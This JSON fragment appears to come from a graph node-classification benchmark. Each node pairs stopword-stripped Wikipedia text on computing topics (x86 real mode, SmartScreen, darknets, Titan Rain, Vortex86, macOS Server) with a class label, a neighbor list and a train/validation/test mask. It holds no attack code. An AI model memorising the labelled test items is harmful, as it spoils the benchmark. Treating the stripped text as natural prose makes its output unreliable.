2^20 2^20 1048576 0x10000 however 80286 24 address bits computes effective addresses 24 bits even real mode therefore segment 0xffff offset greater 0x000f 80286 would actually make access beginning second mebibyte memory whereas 80186 earlier would access address equal offset -0x10 beginning first mebibyte note 80186 earlier first kibibyte address space starting address 0 permanent immovable location interrupt vector table actual amount memory addressable 80286 later x86 cpus real mode 1 mib 64 kib – 16 b 1114096 b programs predating 80286 designed take advantage wrap-around modulo memory addressing behavior 80286 presented problem backward compatibility forcing 21st address line actual logic signal wire coming chip logic low representing zero results modulo-2^20 effect match earlier processors address arithmetic 80286 internal capability perform function ibm used 80286 ibm pc/at solved problem including software-settable gate enable disable force zero a20 address line a20 pin 80286 system bus known gate-a20 a20 gate still implemented pc chipsets day versions himem.sys extended memory driver ibm-/ms-dos famously displayed upon loading message installed a20 handler piece software control gate-a20 coordinate needs programs protected mode a20 line needs enabled else physical addressing errors occur likely leading system crash intel introduced protected mode x86 family intention operating systems used would run entirely new mode programs running protected mode operating system would run protected mode well substantial differences real mode even rather limited 286 protected mode programs written real mode run protected mode without rewritten therefore wide base existing real mode applications users depended abandoning real mode posed problems industry programmers sought way switch modes however intel consistent intentions processor usage provided easy way switch protected mode 80286 easy way switch back real mode 386 way switch protected mode back real mode reset processor reset always starts real mode compatible earlier x86 cpus back 8086 resetting processor clear system ram awkward inefficient actually feasible protected mode processor state saved memory processor reset restarts real mode executes real mode code restore saved state memory run real mode code program ready switch back protected mode switch real mode costly terms time technique allows protected mode programs use services bios runs entirely real mode designed originally 8088-based ibm personal computer model machine type 5150 mode-switching technique also one used dpmi real emulated dos dos extenders like dos/4gw allow protected mode programs run dos dpmi system dos extender switches real mode invoke dos bios calls switches back return application program runs protected mode changing towards nt kernel resulted operating system needing dos boot computer well unable use need restart computer real mode ms-dos declined windows 3.1x longer supported windows way currently running dos applications require real mode within newer versions windows using emulators dosbox x86 virtualization products",
    "neighbors": [
      2304,
      5380,
      389,
      6150,
      10757,
      6153,
      6797,
      5008,
      8976,
      9490,
      10768,
      4884,
      11539,
      6297,
      7323,
      541,
      11550,
      3871,
      1954,
      3496,
      5035,
      814,
      7983,
      178,
      9525,
      823,
      1848,
      3512,
      4928,
      2625,
      1474,
      5312,
      6596,
      1736,
      4424,
      6730,
      6221,
      7501,
      9166,
      5840,
      7377,
      5074,
      6739,
      6868,
      1237,
      86,
      4695,
      7039,
      11601,
      602,
      1501,
      1247,
      5856,
      8545,
      6118,
      2152,
      6506,
      1515,
      5356,
      7403,
      8301,
      1903,
      1776,
      9066,
      7538,
      499,
      5492,
      11634,
      634,
      2811,
      8573,
      255
    ],
    "mask": "None"
  },
  {
    "node_id": 5081,
    "label": 9,
    "text": "Function-level_programming:function-level programming computer science function-level programming refers one two contrasting programming paradigms identified john backus work programs mathematical objects value-level programming 1977 turing award lecture backus set forth considered need switch different philosophy programming language design programming languages appear trouble successive language incorporates little cleaning features predecessors plus ... new language claims new fashionable features ... plain fact languages make programming sufficiently cheaper reliable justify cost producing learning use designed fp first programming language specifically support function-level programming style function-level program variable-free cf point-free programming since program variables essential value-level definitions needed function-level programs function-level style programming program built directly programs given outset combining program-forming operations functionals thus contrast value-level approach applies given programs values form succession values culminating desired result value function-level approach applies program-forming operations given programs form succession programs culminating desired result program result function-level approach programming invites study space programs program-forming operations looking derive useful algebraic properties program-forming operations function-level approach offers possibility making set programs mathematical space emphasizing algebraic properties program-forming operations space programs another potential advantage function-level view ability use strict functions thereby bottom-up semantics simplest kind yet another existence function-level definitions lifted lifted lower value-level higher function-level image existing value-level one often terse function-level definitions represent powerful style programming available value-level backus studied publicized function-level style programming message mostly misunderstood supporting traditional functional programming style languages instead fp successor fl backus calls functional programming applicative programming function-level programming particular constrained type key distinction functional languages backus language following hierarchy types ... way generate new functions use one functional forms fixed build functional form least within fp within ffp formal fp restriction means functions fp module generated built-in functions algebra functional forms thus algebraically tractable instance general question equality two functions equivalent halting problem undecidable equality two functions fp equality algebra thus backus imagines easier even today many users lambda style languages often misinterpret backus function-level approach restrictive variant lambda style de facto value-level style fact backus would disagreed 'restrictive accusation argued precisely due restrictions well-formed mathematical space could arise manner analogous way structured programming limits programming restricted version control-flow possibilities available plain unrestricted unstructured programs value-free style fp closely related equational logic cartesian-closed category canonical function-level programming language fp others include fl j",
    "neighbors": [
      9345,
      9224,
      8722,
      1051,
      6182,
      2216,
      9385,
      7851,
      5168,
      1591,
      1976,
      10042,
      10819,
      8262,
      9926,
      3529,
      5585,
      11219,
      2774,
      1388,
      2670,
      8430,
      2680
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5082,
    "label": 4,
    "text": "Microsoft_SmartScreen:microsoft smartscreen smartscreen officially called windows smartscreen windows defender smartscreen smartscreen filter different places cloud-based anti-phishing anti-malware component included several microsoft products including windows 8 later internet explorer microsoft edge outlook.com designed help protect users attacks utilize social engineering drive-by downloads infect system scanning urls accessed user blacklist websites containing known threats windows 10 creators update microsoft placed smartscreen settings windows defender security center smartscreen first introduced internet explorer 7 known phishing filter phishing filter check every website visited user known suspicious release internet explorer 8 phishing filter renamed smartscreen extended include protection socially engineered malware every website download checked local list popular legitimate websites site listed entire address sent microsoft checks labeled impostor harmful internet explorer 8 show screen prompting site reported harmful n't visited user either visit homepage visit previous site continue unsafe page user attempts download file location reported harmful download cancelled effectiveness smartscreen filtering reported superior socially engineered malware protection browsers according microsoft smartscreen technology used internet explorer 8 successful phishing malicious sites blocking socially engineered malware beginning internet explorer 8 smartscreen enforced using group policy building top smartscreen filter introduced internet explorer 8 internet explorer 9 protection malware downloads extended smartscreen application reputation detects untrustworthy executables warns person downloading executable program without safe reputation site safe reputation internet explorer mobile 10 first release internet explorer mobile support smartscreen filter smartscreen filtering desktop level performing reputation checks default file application downloaded internet introduced windows 8 similar way smartscreen works internet explorer 9 program established good reputation user alerted running program may harm computer smartscreen left default settings administrator needs launch run program microsoft faced concerns surrounding privacy legality effectiveness new system suggesting automatic analysis files involves sending cryptographic hash file user ip address server could used build database users downloads online use outdated ssl 2.0 protocol communication could allow attacker eavesdrop data response microsoft later issued statement noting ip addresses collected part normal operation service would periodically deleted smartscreen windows 8 would use ssl 3.0 security reasons information gathered via smartscreen would used advertising purposes sold third parties outlook.com uses smartscreen protect users unsolicited email messages spam fraudulent emails phishing malware spread via e-mail system mainly controls used e-mail hyperlinks attachments filter spam smartscreen filter uses machine learning microsoft research learns known spam threats user feedback emails marked spam user time preferences help smartscreen filter distinguish characteristics unwanted legitimate e-mail also determine reputation senders number emails checked using algorithms reputation sender scl rating spam confidence level score assigned e-mail message lower score desirable score -1 0 1 considered spam message delivered recipient inbox score 5 6 7 8 9 considered spam delivered recipient junk folder scores 5 6 considered suspected spam score 9 considered certainly spam scl score email found various x-headers received email smartscreen filter also analyses email messages fraudulent suspicious web links suspicious characteristics found email message either directly sent spam folder red information bar top message warns suspect properties smartscreen also protects spoofed domain names spoofing emails verify whether email sent domain claims sent uses technology sender id domainkeys identified mail dkim smartscreen filter also ensures one email authenticated senders distinguish easily putting green shield icon subject line emails f smartscreen also included microsoft outlook microsoft exchange server late 2010 results browser malware testing undertaken nss labs published study looked browser capability prevent users following socially engineered links malicious nature downloading malicious software test browser ability block malicious web pages code according nss labs internet explorer 9 blocked 99 malware downloads compared 90 internet explorer 8 smartscreen application reputation feature opposed 13 achieved firefox chrome safari use google safe browsing malware filter opera 11 found block 5 malware smartscreen filter also noted adding legitimate sites blocklists almost instantaneously opposed several hours took blocklists updated browsers early 2010 similar tests given internet explorer 8 85 passing grade 5 improvement attributed continued investments improved data intelligence comparison research showed chrome 6 firefox 3.6 safari 5 scored 6 19 11 respectively opera 10 scored 0 failing detect socially engineered malware samples manufacturers browsers criticized test focusing upon lack transparency urls tested lack consideration layered security additional browser google commenting report clearly states evaluate browser security related vulnerabilities plug-ins browsers opera commenting results appeared odd received results data providers social malware protection indicator overall browser security july 2010 microsoft claimed smartscreen internet explorer blocked billion attempts access sites containing security risks according microsoft smartscreen filter included outlook.com blocks 4.5 billion unwanted e-mails daily reaching users microsoft also claims 3 incoming email junk mail test cascade insights says half junk mail still arrives inbox users september 2011 blog post microsoft stated 1.5 billion attempted malware attacks 150 million attempted phishing attacks stopped october 2017 criticisms regarding url submission methods addressed creation report unsafe site url submission page microsoft supports url submissions form opposed previous experience user visit site use in-product reporting methods smartscreen filter bypassed phishing attacks use phishing email linking front-end url microsoft database clicking url email redirects user malicious site report website option internet explorer reports currently-open page front-end url phishing attack reported microsoft remains accessible smartscreen filter creates problem small software vendors distribute updated version installation binary files internet whenever updated version released smartscreen responds stating file commonly downloaded therefore install harmful files system fixed author digitally signing distributed software reputation based file hash signing certificate well common distribution method authors bypass smartscreen warnings pack installation program example setup.exe zip-archive distribute way though confuse non-expert users another criticism smartscreen makes non-commercial/small end software development unaffordable developers either purchase standard code signing certificates expensive extended validation certificates extended validation certificates allow developer immediately establish reputation smartscreen often unaffordable people developing software either free immediate profit standard code signing certicates however pose catch-22 developers since smartscreen warnings make people reluctant download software consequence get downloads requires first passing smartscreen passing smartscreen requires getting reputation getting reputation dependent downloads want contribute smartscreen report site smartscreen via https //feedback.smartscreen.microsoft.com/feedback.aspx url= type http -address url=",
    "neighbors": [
      2309,
      8584,
      1417,
      2443,
      6028,
      537,
      3482,
      2848,
      7713,
      5799,
      5673,
      7473,
      4793,
      700,
      5057,
      10828,
      5078,
      10845,
      3935,
      9695,
      3555,
      4326,
      9712,
      11248,
      4722
    ],
    "mask": "None"
  },
  {
    "node_id": 5083,
    "label": 7,
    "text": "INSANE_(software):insane software insane proprietary interactive streaming animation engine developed lucasarts primarily programmer/game designer vincent lee using custom video compression technology greatly compresses moving images high quality full-screen videos displayed even hi-res graphics modes pc early version first developed followed much enhanced version full throttle outlaws dig also used 1998 games mortimer riddles medallion compression technology incorporated star wars episode insider guide jar jar journey adventure book use full throttle caused problems since insane intended photorealistic contrasting general cartoony feeling rendered environment scaled match rest game world later enhancements made compression technology optimize cartoon style imagery used outlaws",
    "neighbors": [
      8122,
      7586,
      8454,
      2826,
      3210,
      11306,
      6900,
      2293,
      4182,
      11700,
      5914,
      9691,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 5084,
    "label": 2,
    "text": "OpenIKED:openiked openiked free permissively licensed internet key exchange ikev2 daemon developed part openbsd operating system",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      10889,
      1932,
      274,
      8211,
      9722,
      7702,
      10105,
      11162,
      10908,
      3742,
      9764,
      4268,
      6702,
      7983,
      9520,
      10417,
      7859,
      2228,
      3777,
      2884,
      2245,
      5959,
      1993,
      8265,
      8778,
      3404,
      11468,
      11086,
      10831,
      7376,
      5970,
      11606,
      2136,
      9048,
      6490,
      6364,
      10210,
      7139,
      1637,
      9318,
      4071,
      8039,
      8954,
      5230,
      11248,
      5749,
      1785,
      3322,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5085,
    "label": 7,
    "text": "Darknet:darknet dark net darknet umbrella term describing portions internet purposefully open public view hidden networks whose architecture superimposed internet darknet often associated encrypted part internet called tor network illicit trading takes place infamous online drug bazaar called silk road also considered part deep web.. anonymous communication whistle-blowers journalists news organisations facilitated darknet tor network use applications including securedrop term originally described computers arpanet hidden programmed receive messages respond acknowledge anything thus remaining invisible dark.an account detailed first online transaction related drugs transpired 1971 students massachusetts institute technology stanford university traded marijuana using arpanet accounts former artificial intelligence laboratory term later usage incorporated services dark web overlay network accessed specific software configurations authorization often using non-standard communication protocols ports types dark webs include friend-to-friend networks usually used file sharing peer-to-peer connection privacy networks tor reciprocal term encrypted darknet clearnet surface web referring content indexable search engines term darknet often used interchangeably dark web due quantity hidden services tor darknet term often inaccurately used interchangeably deep web due tor history platform could search-indexed mixing uses terms described inaccurate commentators recommending terms used distinct fashions darknet coined 1970s designate networks isolated arpanet government-founded military/academical network evolved internet security purposes darknet addresses could receive data arpanet appear network lists would answer pings inquiries term gained public acceptance following publication darknet future content distribution 2002 paper peter biddle paul england marcus peinado bryan willman four employees microsoft argued presence darknet primary hindrance development workable digital rights management drm technologies made copyright infringement inevitable paper described darknet generally type parallel network encrypted requires specific protocol allow user connect journalist j. d. lasica 2005 book darknet hollywood war digital generation described darknet reach encompassing file sharing networks subsequently 2014 journalist jamie bartlett book dark net used term describe range underground emergent subcultures including camgirls cryptoanarchists darknet drug markets self harm communities social media racists transhumanists telegram features encryption ban territory different countries also belongs darknet anonymity contains encrypted channels sale prohibited substances recruiting various organizations coordinating anti-government actions darknets general may used various reasons darknets require specific software installed network configurations made access tor accessed via customised browser vidalia aka tor browser bundle alternatively via proxy configured perform function",
    "neighbors": [
      4229,
      4490,
      1169,
      11029,
      10522,
      1692,
      3366,
      8998,
      9273,
      3770,
      6719,
      8640,
      11073,
      8386,
      708,
      6351,
      3792,
      4945,
      6991,
      6993,
      7761,
      3676,
      3428,
      3813,
      10726,
      7921,
      4083,
      1908,
      4725,
      5749,
      8692,
      9332
    ],
    "mask": "Test"
  },
  {
    "node_id": 5086,
    "label": 6,
    "text": "Linux_Userland_Filesystem:linux userland filesystem linux userland filesystem lufs file system linux similar fuse file system driver provides bridge kernel mode user mode lufs possible among things mount remote directories via ssh ftp gnutella fuse lufs filesystem developed little effort comparable normal application addition fuse linux kernel lufs lost relevance longer developed",
    "neighbors": [
      7364,
      4229,
      10341,
      11568,
      823,
      2395,
      2397
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5087,
    "label": 4,
    "text": "Titan_Rain:titan rain titan rain designation given federal government united states series coordinated attacks american computer systems since 2003 known ongoing least three years attacks originated guangdong china activity known titan rain believed associated state-sponsored advanced persistent threat titan rain hackers gained access many united states defense contractor computer networks targeted sensitive information including lockheed martin sandia national laboratories redstone arsenal nasa series attacks believed actions people ’ liberation army pla unit 61398 hackers attacked american defense intelligence agency – dod british government departments ministry defence – mod british government incident 2006 part house commons computer system shut “ organised chinese hacking group. ” chinese government denied responsibility ‘ titan rain ’ caused friction u.s. chinese governments u.s. government blamed chinese government attacks 2004 unclassified although potentially fatal information alan paller sans institute research director stated attacks came individuals “ intense discipline ” “ organisation could military ” sophistication evidence pointed toward chinese military people ’ liberation army attackers ‘ titan rain ’ reportedly attacked multiple high-end political systems nasa fbi although sensitive classified information reported stolen hackers however able steal unclassified information e.g information home computer fact information classified somewhat irrelevant comes together could reveal strengths weaknesses u.s. making attack damaging ‘ titan rain ’ caused distrust countries united kingdom russia – superpowers china distrust occurred countries likely attacked either detect attack released statements attacked united kingdom stated officially governmental offices attacked hackers chinese source events ‘ titan rain ’ caused rest world cautious attacks china countries well thereby causing however small slight distrust countries distrust may affect future agreements dealings affect relationship china",
    "neighbors": [
      3072,
      5636,
      3852,
      7440,
      150,
      9630,
      184,
      10297,
      11195,
      3704,
      9688,
      1113,
      7515,
      4830,
      4063,
      2147,
      1381,
      1254,
      8045,
      4462,
      9460,
      7798,
      6520
    ],
    "mask": "Test"
  },
  {
    "node_id": 5088,
    "label": 3,
    "text": "Vortex86:vortex86 vortex86 computing system-on-a-chip soc based core compatible x86 microprocessor family produced dm p electronics originated rise technology vortex86 previously belonged sis got basic design rise technology sis sold dm p electronics taiwan adopting vortex86 series dm p manufactured m6117d intel 386sx compatible 25–40 mhz soc vortex86 cpus implement i586 architecture early versions vortex86 original vortex86sx floating point unit fpu code runs i486sx cpu without 487 run vortex86 code runs i586 use floating point instructions i586 code run vortex86dx later linux kernels build-time option emulate fpu cpu missing one program uses i586-level floating point instructions work vortex86 family cpu kernel albeit slowly model fpu advanced models fpus i686-level instructions fucomi code intended i686 may fail cpu lacks conditional move cmov instruction instruction combines effect conditional branch move instruction compilers asked optimize code advanced cpu example gnu compiler -march=i686 option generate code uses cmov linux systems intended run i686 generally runnable vortex86 gnu c library built i686 uses cmov instruction assembly language strcmp function dynamic loader ld.so uses hence program uses shared libraries even start technically cmov optional i686 architecture intel i686 product pentium pro consequently things generate code typically consider cmov available ask generate code i686 devices vortex86dx3 run fedora 17 i686 live cd successfully unlike use versions vortex86 implies vortex86dx3 implements i686 features others properties vortex86 original cpu reported linux kernel tool codice_1 note cpu later version fpu dm p provides embedded linux distribution customized use socs features netbsd/i386 able boot least dx3 sis55x/rise mp6 simply vortex86 – developed sis three integer mmx pipelines branch prediction 300 mhz 16 kb data 16 kb instruction l1 cache fpu l2 cache use sd ddr2 ram 600 mhz 1 ghz 2.02 w 800 mhz 16 kb data 16 kb instruction l1 cache fpu 256 kb l2 cache 6-staged pipeline address 1 gib ddr2 ram pdx-600 version vortex86dx differs number rs-232 ports 3 instead 5 i²c servo controllers thus targeting embedded industrial market netbooks similar belco 450r use chip package single 581-pin bga package 1 ghz cpu core hardly differs vortex86dx according several sources processor appear implemented simd multi-media instructions mmx version drops conformance isa integrates gpu hd audio controller also integrates udma/100 ide controller consumer grade version known pmx-1000 current models gecko edubook use xcore86 rebadge vortex86mx 32kb write 2-way l1 cache 256kb write through/write back 4-way l2 cache pci rev 2.1 32-bit bus interface 33 mhz ddr2 rom controller ipc internal peripheral controllers dma interrupt timer/counter included fast ethernet fifo uart usb2.0 host ata controller mx+ adds vga controller chip shared memory package single 720-pin bga package 32kb write 4-way l1 cache 16k instruction 16k data 256kb write through/write back 4-way l2 cache pci rev 2.1 32-bit bus interface 33 mhz ddr2 rom controller ipc internal peripheral controllers dma interrupt timer/counter included vga 100 mbps ethernet fifo uart usb2.0 host ata controller enhancements dx include com ports 9 2gb ram hd audio codec well gpio pins package single 720-pin bga package 32kb write 2-way l1 cache 128kb write through/write back 2-way l2 cache pci-e bus interface 300 mhz ddr3 rom controller ipc internal peripheral controllers dma interrupt timer/counter included fast ethernet fifo uart usb2.0 host ata controller package single 288-pin tfbga-package 1.0 ghz dual-core cpu i686-compatible vortex86 eight-way 32k i-cache eight-way 32k d-cache four-way 512 kb l2 cache write-through write-back policy support 2gb ddr3 ram pci-e bus interface 100 mbps ethernet fifo uart usb 2.0 host ata controller ide controller pata 100 2x hdd 2x sd primary channel sata 1.5gbit/s 1 port secondary channel package single 720-pin bga-package ex2 model two asymmetrical master/slave cpu cores master core runs 600mhz 16k i-cache 16k d-cache four-way 128 kb l2 cache write-through write-back policy slave core operates 400 mhz also 16kb i-cache 16kb d-cache l2 cache built-in fpu maximum ddr3 ram capacity 2gb produced using 65nm manufacturing process uses 19x19mm lfbga-441 package",
    "neighbors": [
      7008,
      10658,
      3175,
      8523,
      6924,
      10734,
      2383,
      5681,
      499,
      1461,
      823,
      5368,
      3194,
      8125
    ],
    "mask": "Test"
  },
  {
    "node_id": 5089,
    "label": 4,
    "text": "Alan_Woodward_(computer_scientist):alan woodward computer scientist alan woodward british computer scientist visiting professor university surrey specialist computer security fellow institute physics chartered physicist chartered practitioner chartered engineer fellow british computer society eur ing fellow royal statistical society",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5090,
    "label": 3,
    "text": "Dataflow_architecture:dataflow architecture dataflow architecture computer architecture directly contrasts traditional von neumann architecture control flow architecture dataflow architectures program counter concept executability execution instructions solely determined based availability input arguments instructions order instruction execution unpredictable i.e behavior nondeterministic although commercially successful general-purpose computer hardware used dataflow architecture successfully implemented specialized hardware digital signal processing network routing graphics processing telemetry recently data warehousing also relevant many software architectures today including database engine designs parallel computing frameworks synchronous dataflow architectures tune match workload presented real-time data path applications wire speed packet forwarding dataflow architectures deterministic nature enable programmers manage complex tasks processor load balancing synchronization accesses common resources meanwhile clash terminology since term dataflow used subarea parallel programming dataflow programming hardware architectures dataflow major topic computer architecture research 1970s early 1980s jack dennis mit pioneered field static dataflow architectures manchester dataflow machine mit tagged token architecture major projects dynamic dataflow research however never overcame problems related instructions data dependencies proved fine-grained effectively distributed large network time instructions tagged results travel large connection network longer time actually computations nonetheless out-of-order execution ooe become dominant computing paradigm since 1990s form restricted dataflow paradigm introduced idea execution window execution window follows sequential order von neumann architecture however within window instructions allowed completed data dependency order accomplished cpus dynamically tag data dependencies code execution window logical complexity dynamically keeping track data dependencies restricts ooe cpus small number execution units 2-6 limits execution window sizes range 32 200 instructions much smaller envisioned full dataflow machines designs use conventional memory addresses data dependency tags called static dataflow machines machines allow multiple instances routines executed simultaneously simple tags could differentiate designs use content-addressable memory cam called dynamic dataflow machines use tags memory facilitate parallelism normally control flow architecture compilers analyze program source code data dependencies instructions order better organize instruction sequences binary output files instructions organized sequentially dependency information recorded binaries binaries compiled dataflow machine contain dependency information dataflow compiler records dependencies creating unique tags dependency instead using variable names giving dependency unique tag allows non-dependent code segments binary executed order parallel compiler detects loops break statements various programming control syntax data flow programs loaded cam dynamic dataflow computer tagged operands instruction become available output previous instructions and/or user input instruction marked ready execution execution unit known activating firing instruction instruction completed execution unit output data sent tag cam instructions dependent upon particular datum identified tag value marked ready execution way subsequent instructions executed proper order avoiding race conditions order may differ sequential order envisioned human programmer programmed order instruction along required data operands transmitted execution unit packet also called instruction token similarly output data transmitted back cam data token packetization instructions results allows parallel execution ready instructions large scale dataflow networks deliver instruction tokens execution units return data tokens cam contrast conventional von neumann architecture data tokens permanently stored memory rather transient messages exist transit instruction storage",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      4811,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      2339,
      6950,
      2345,
      3886,
      309,
      8501,
      5948,
      4928,
      4417,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      7505,
      9044,
      2901,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      10117,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      4036,
      453,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      7134,
      995,
      7653,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 5091,
    "label": 3,
    "text": "Pitfall_II:_Lost_Caverns:pitfall ii lost caverns pitfall ii lost caverns platform video game originally released atari 2600 activision 1984 sequel pitfall 1982 games designed programmed david crane star jungle explorer pitfall harry pitfall ii major additions much larger world vertical scrolling rivers swim balloons grabbed float locations released north american video game crash 1983 interest 2600 waning pitfall ii one last major releases console one technically impressive cartridge contains custom display processor chip designed david crane allow improved visuals four channel music instead two system normally capable pitfall ii ported atari 5200 colecovision tandy color computer apple ii atari 8-bit family msx commodore 64 ibm pc compatibles self-booting disk game plot loosely remade super pitfall famicom/nes 1985 sega released arcade version pitfall ii different visual style ported sg-1000 console japan pitfall involved player avoiding danger forms crocodiles scorpions cobras quicksand lost caverns expands scope environment dramatically player descends deep underground addition familiar screen-flipping harry travels right left game adds element vertical scrolling harry falls cliff flies around grabbing onto balloon unlike first game pitfall harry unlimited time lives making impossible lose game harry touches dangerous creature simply loses points moves back last continue point marked red cross touched along journey unlike original pitfall however ground level underground pitfall ii 27 horizontal levels predominantly height stacked atop levels span full eight screens length openly accessible way across portions blocked cave walls force harry travel areas order progress quicksand tar pits replaced rivers chasms balloons let harry ascend new areas two new unplayable characters debut lost caverns quickclaw harry cowardly pet mountain lion rhonda adventure-seeking niece characters also appear harry saturday supercade children cartoon based pitfall games fact rhonda quickclaw created saturday supercade full year game released collecting rhonda quickclaw diamond ring necessary win game versions without second cave upon collection three game ends spot maximum possible score 199,000 differs atari 8-bit 5200 versions see another creature cave rat shown next screen right quickclaw shown beginning game platform harry starting point however harry able reach quickclaw facing rat head-on via third screen hole river advancing left attempts rat push back river addition previous game addition soundtrack musical cues act subtle rewards punishments performance main heroic theme plays short reaching loop acoustic music harry collects treasure main theme begins harry dies slower minor key version theme plays progresses back atmospheric theme finally harry ascends using balloon sobre las olas waves played atari 5200 atari 8-bit versions called adventurer edition title screens contain additional content programmer mike lorenzen reused david crane code 2600 version added entirely new level game would playable initial game finished marketing would allow two versions different demanded additional game stripped atari version instead left easter egg pitfall ii lost caverns named 1 best 25 atari 2600 games time issue 46 retro gamer magazine gamasutra included open world game game design essentials series",
    "neighbors": [
      5091,
      7051,
      9006,
      6129,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 5092,
    "label": 5,
    "text": "Carrier-sense_multiple_access:carrier-sense multiple access carrier-sense multiple access csma media access control mac protocol node verifies absence traffic transmitting shared transmission medium electrical bus band electromagnetic spectrum transmitter attempts determine whether another transmission progress initiating transmission using carrier-sense mechanism tries detect presence carrier signal another node attempting transmit carrier sensed node waits transmission progress end initiating transmission using csma multiple nodes may turn send receive medium transmissions one node generally received nodes connected medium variations basic csma include addition collision-avoidance collision-detection collision-resolution techniques variations csma use different algorithms determine initiate transmission onto shared medium key distinguishing feature algorithms aggressive persistent initiating transmission aggressive algorithm may begin transmission quickly utilize greater percentage available bandwidth medium typically expense increased likelihood collision transmitters broadcasting vehicular ad hoc networks original 1-persistence p-persistence strategies often cause broadcast storm problem improve performance engineers developed three modified techniques weighted p-persistence slotted 1-persistence slotted p-persistence",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      9098,
      10005,
      11288,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      2994,
      7490,
      9284,
      5321,
      6857,
      7498,
      2911,
      2912,
      2785,
      5863,
      2802,
      4339
    ],
    "mask": "None"
  },
  {
    "node_id": 5093,
    "label": 2,
    "text": "MacOS_Server:macos server macos server product formerly called mac os x server os x server mac os x server stand-alone operating system whereas macos server sold operating system add-on app provides additional server programs along management administration tools ios macos prior version 10.7 lion mac os x server separate similar unix server operating system apple inc. architecturally identical desktop counterpart mac os x release version 10.7 lion mac os x mac os x server combined one release separate server operating system longer sold server-specific server applications work group management administration software tools mac os x server offered macos server add-on package macos sold mac app store 19.99 june 2019 along workgroup manager 10.8 available apple support web site tools simplify access key network services including mail transfer agent afp smb servers ldap server domain name server others also included particularly later versions numerous additional services tools manage web server wiki server chat server calendar server many others mac os x server provided operating system xserve computers rack mounted server computers designed apple also optionally pre-installed mac mini mac pro sold separately use macintosh computer meeting minimum requirements macos server based open source foundation called darwin uses open industry standards protocols included services applications file sharing sharing contact information calendars schedule events send secure instant messages conduct live video conferences send receive email contribute comment wikis publish company-wide blog produce distribute podcasts set websites first version mac os x mac os x server 1.0 mac os x server 1.0 – 1.2v3 based rhapsody hybrid openstep next computer mac os 8.5.1 gui looked like mixture mac os 8 platinum appearance openstep next-based interface included runtime layer called blue box running legacy mac os-based applications within separate window discussion implementing 'transparent blue box would intermix mac os applications written rhapsody yellow box environment would happen mac os x classic environment apple file services macintosh manager quicktime streaming server webobjects netboot included mac os x server 1.0 – 1.2v3 could use firewire devices released may 21 2001 mac os x server 10.0 included new aqua user interface apache php mysql tomcat webdav support macintosh manager netboot released september 25 2001 released august 23 2002 10.2 mac os x server release includes updated open directory user file management release based ldap beginning deprecation next-originated netinfo architecture new workgroup manager interface improved configuration significantly release also saw major updates netboot netinstall many common network services provided ntp snmp web server apache mail server postfix cyrus ldap openldap afp print server inclusion samba version 3 allows tight integration windows clients servers mysql v4.0.16 php v4.3.7 also included released october 24 2003 10.3 mac os x server release includes updated open directory user file management release based ldap beginning deprecation next-originated netinfo architecture new workgroup manager interface improved configuration significantly many common network services provided ntp snmp web server apache mail server postfix cyrus ldap openldap afp print server inclusion samba version 3 allows tight integration windows clients servers mysql v4.0.16 php v4.3.7 also included released april 29 2005 10.4 release adds 64-bit application support access control lists xgrid link aggregation e-mail spam filtering spamassassin virus detection clamav gateway setup assistant servers software update ichat server using xmpp boot camp assistant dashboard weblogs august 10 2006 apple announced first universal binary release mac os x server version 10.4.7 supporting powerpc intel processors time apple announced release intel-based mac pro xserve systems released october 26 2007 leopard server sold 999 unlimited client license features released august 28 2009 snow leopard server sold 499 included unlimited client licenses new features released july 20 2011 releasing developer preview mac os x lion february 2011 apple indicated beginning lion mac os x server would bundled operating system would marketed separate product however months later company said would instead sell server components us 49.99 add-on lion distributed mac app store well lion combined cost upgrade lion purchase os x server add-on costs approximately us 50 nonetheless significantly lower retail cost snow leopard server us 499 lion server came unlimited client licenses snow leopard server lion server includes new versions ical server wiki server mail server significantly lion server used ios mobile device management released july 25 2012 like lion mountain lion separate server edition os x server package available mountain lion mac app store us 19.99 included server management application called server well additional administrative tools manage client profiles xsan mountain lion server like lion server provided unlimited client licenses purchased could run unlimited number systems released october 22 2013 separate server edition mavericks separate server edition mountain lion package available mac app store 19.99 includes server management app called server well additional administrative tools manage client profiles xsan purchased run unlimited number machines enrolled mac ios developer programs given code download os x server free released october 16 2014 separate server edition yosemite separate server edition mavericks package available mac app store 19.99 includes server management app called server well additional administrative tools manage client profiles xsan purchased run unlimited number machines enrolled mac ios developer programs given code download os x server free released september 16 2015 version 5.0.3 os x server operates either os x yosemite 10.10.5 os x el capitan 10.11 released march 21 2016 os x server 5.1 requires 10.11.4 el capitan previous versions os x server ’ work 10.11.4 el capitan released september 20 2016 version 5.2 macos server operates either os x el capitan 10.11 macos sierra 10.12 released march 17 2017 version 5.3 macos server operates macos sierra 10.12.4 later released september 25 2017 version 5.4 macos server operates macos high sierra 